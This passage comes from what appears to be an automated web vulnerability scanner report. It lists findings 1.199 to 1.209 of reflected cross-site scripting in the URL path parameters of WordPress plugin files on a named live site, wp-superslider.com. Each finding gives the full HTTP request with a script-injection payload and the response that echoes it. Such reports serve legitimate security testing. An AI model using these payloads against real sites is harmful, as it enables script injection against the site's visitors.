Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:30 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674550+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674551; expires=Thu, 02-Feb-2012 19:22:31 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53483

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-login/plugin-data/supersliderd94d5\"><script>alert(1)</script>8937e1e9ddf/ssLogin/default/default_horizontal.css" />
...[SNIP]...

1.199. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1d48"><script>alert(1)</script>dbdb56bcb58 was submitted in the REST URL parameter 7. This input was echoed as e1d48\"><script>alert(1)</script>dbdb56bcb58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogine1d48"><script>alert(1)</script>dbdb56bcb58/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674552+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674553; expires=Thu, 02-Feb-2012 19:22:33 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:33 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogine1d48\"><script>alert(1)</script>dbdb56bcb58/default/default_horizontal.css" />
...[SNIP]...

1.200. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afe00"><script>alert(1)</script>5f54c2a8b93 was submitted in the REST URL parameter 8. This input was echoed as afe00\"><script>alert(1)</script>5f54c2a8b93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/defaultafe00"><script>alert(1)</script>5f54c2a8b93/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:34 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674554+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674555; expires=Thu, 02-Feb-2012 19:22:35 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/defaultafe00\"><script>alert(1)</script>5f54c2a8b93/default_horizontal.css" />
...[SNIP]...

1.201. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87487"><script>alert(1)</script>39e89501d03 was submitted in the REST URL parameter 9. This input was echoed as 87487\"><script>alert(1)</script>39e89501d03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css87487"><script>alert(1)</script>39e89501d03 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:37 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674557+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674557; expires=Thu, 02-Feb-2012 19:22:37 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css87487\"><script>alert(1)</script>39e89501d03" />
...[SNIP]...

1.202. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/js/nav-follow-min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea79a"><script>alert(1)</script>9de5f2df942 was submitted in the REST URL parameter 1. This input was echoed as ea79a\"><script>alert(1)</script>9de5f2df942 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /siteea79a"><script>alert(1)</script>9de5f2df942/wp-content/plugins/superslider-menu/js/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674561+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674561; expires=Thu, 02-Feb-2012 19:22:41 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/siteea79a\"><script>alert(1)</script>9de5f2df942/wp-content/plugins/superslider-menu/js/nav-follow-min.js" />
...[SNIP]...

1.203. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/js/nav-follow-min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63b7c"><script>alert(1)</script>2271b17551d was submitted in the REST URL parameter 2. This input was echoed as 63b7c\"><script>alert(1)</script>2271b17551d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content63b7c"><script>alert(1)</script>2271b17551d/plugins/superslider-menu/js/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674563+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674563; expires=Thu, 02-Feb-2012 19:22:43 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content63b7c\"><script>alert(1)</script>2271b17551d/plugins/superslider-menu/js/nav-follow-min.js" />
...[SNIP]...

1.204. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/js/nav-follow-min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc9a"><script>alert(1)</script>550f85bc728 was submitted in the REST URL parameter 3. This input was echoed as dfc9a\"><script>alert(1)</script>550f85bc728 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/pluginsdfc9a"><script>alert(1)</script>550f85bc728/superslider-menu/js/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:44 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674564+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674564; expires=Thu, 02-Feb-2012 19:22:44 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/pluginsdfc9a\"><script>alert(1)</script>550f85bc728/superslider-menu/js/nav-follow-min.js" />
...[SNIP]...

1.205. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/js/nav-follow-min.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeafd"><script>alert(1)</script>0b49ecee366 was submitted in the REST URL parameter 4. This input was echoed as eeafd\"><script>alert(1)</script>0b49ecee366 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menueeafd"><script>alert(1)</script>0b49ecee366/js/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674566+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674566; expires=Thu, 02-Feb-2012 19:22:46 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menueeafd\"><script>alert(1)</script>0b49ecee366/js/nav-follow-min.js" />
...[SNIP]...

1.206. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/js/nav-follow-min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daaa3"><script>alert(1)</script>cfbe353e491 was submitted in the REST URL parameter 5. This input was echoed as daaa3\"><script>alert(1)</script>cfbe353e491 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menu/jsdaaa3"><script>alert(1)</script>cfbe353e491/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674568+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674568; expires=Thu, 02-Feb-2012 19:22:48 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menu/jsdaaa3\"><script>alert(1)</script>cfbe353e491/nav-follow-min.js" />
...[SNIP]...

1.207. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/js/nav-follow-min.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fcb6"><script>alert(1)</script>4b7a1a7b17f was submitted in the REST URL parameter 6. This input was echoed as 1fcb6\"><script>alert(1)</script>4b7a1a7b17f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menu/js/nav-follow-min.js1fcb6"><script>alert(1)</script>4b7a1a7b17f HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:49 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js1fcb6\"><script>alert(1)</script>4b7a1a7b17f" />
...[SNIP]...

1.208. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d618f"><script>alert(1)</script>b5bbe65fee5 was submitted in the REST URL parameter 1. This input was echoed as d618f\"><script>alert(1)</script>b5bbe65fee5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sited618f"><script>alert(1)</script>b5bbe65fee5/wp-content/plugins/superslider-menu/js/superslider-menu-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674561+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674561; expires=Thu, 02-Feb-2012 19:22:41 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/sited618f\"><script>alert(1)</script>b5bbe65fee5/wp-content/plugins/superslider-menu/js/superslider-menu-min.js" />
...[SNIP]...

1.209. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed395"><script>alert(1)</script>4ecb0a29794 was submitted in the REST URL parameter 2. This input was echoed as ed395\"><script>alert(1)</script>4ecb0a29794 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-contented395"><script>alert(1)</script>4ecb0a29794/plugins/superslider-menu/js/superslider-menu-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674563+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674563; expires=Thu, 02-Feb-2012 19:22:43 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-contented395\"><script>alert(1)</script>4ecb0a29794/plugins/superslider-menu/js/superslider-menu-min.js" />
...[SNIP]...

